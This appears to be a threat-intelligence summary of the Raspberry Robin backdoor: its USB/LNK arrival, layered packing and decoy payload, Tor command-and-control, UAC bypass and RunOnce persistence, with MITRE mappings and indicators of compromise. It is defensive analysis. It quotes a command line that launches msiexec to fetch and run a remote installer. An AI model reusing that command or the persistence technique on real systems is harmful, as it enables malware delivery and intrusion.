Raspberry Robin is a multi-layer, packed backdoor that spreads via infected USB using LNK files to trigger a downloader and, in some samples, a fake payload to evade analysis while the real payload remains heavily obfuscated and connects to Tor for C2. The operation targets telecoms and government offices across Latin America, Oceania, and Europe, with possible ties to broader cyber-espionage and potential links to LockBit tooling. #RaspberryRobin #Tor #Msiexec #LNK #TrendMicro #LockBit
Keypoints
- The arrival routine uses an infected USB and arrives as a shortcut (LNK) file to drop and run payloads.
- The LNK contains a command line that launches a legitimate Windows component to download an MSI package, enabling loader delivery.
- The main malware is multi-layered and packed to hinder analysis, with several layers performing anti-analysis techniques.
- A fake payload is dropped and loaded when anti-analysis is detected, while the real payload remains obfuscated and loaded later.
- The real payload includes a Tor client for C2 communication and a shared memory mechanism for data exchange, with hard-coded Tor addresses.
- The campaign predominantly targets government agencies and telecoms in Latin America, Oceania, and Europe, with indicators including a SHA256 hash and Tor onion addresses.
<liThe malware uses a UAC bypass to escalate privileges and persistence via RunOnce/RunOnceEx registry keys.
MITRE Techniques
- [T1023] Shortcut Modification – The arrival routine uses an infected USB delivering a shortcut to trigger payloads, and it “arrives as a shortcut or LNK file.”
- [T1218.005] Msiexec – The LNK file contains a command line that runs a legitimate executable to download a Windows Installer (MSI) package: “cmd.exe /c start msiexec {URL}”.
- [T1059.003] Windows Command Shell – Cmd.exe interprets the command after /c, enabling the download and execution flow: “cmd.exe /c start msiexec {URL}”.
- [T1027] Obfuscated/Compressed Files and Information – The main malware is “packed multiple times, with each layer heavily obfuscated” and uses layered packing.
- [T1090] Proxy – The real payload “attempts to connect to the hard-coded Tor addresses” via a Tor client for C2 communications.
- [T1548.002] Bypass User Account Control – The drop uses a UAC bypass variant to run the dropped copy as Administrator: “variation of the technique ucmDccwCOMMethod in UACMe.”
- [T1060] Registry Run Keys / Startup Folder (RunOnce/RunOnceEx) – The malware modifies RunOnce/RunOnceEx registry entries to enable automatic startup: “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce” and “HKEY_LOCAL_MACHINEWindowsCurrentVersionRunOnceEx.”
- [T1027] Obfuscated/Compressed Files and Information – The anti-analysis and multi-layer packing extend the capabilities to hinder researchers; “anti-analysis techniques” are noted in layers 3 and 5.
Indicators of Compromise
- [SHA256] Main malware executable – 6fb0ad3f756b5d1f871cf34c3e4ea47cb34643cd17709a09c25076c400313adf
- [Onion Address] Tor-based C2 endpoints – sejnfjrq6szgca7v, zdfsyv3rubuhpql3, and 18 more onion addresses
- [URL / Domain] MSI download/source URL pattern – http://{domain}:8080/{random strings}/ (and variants with user or query parameters)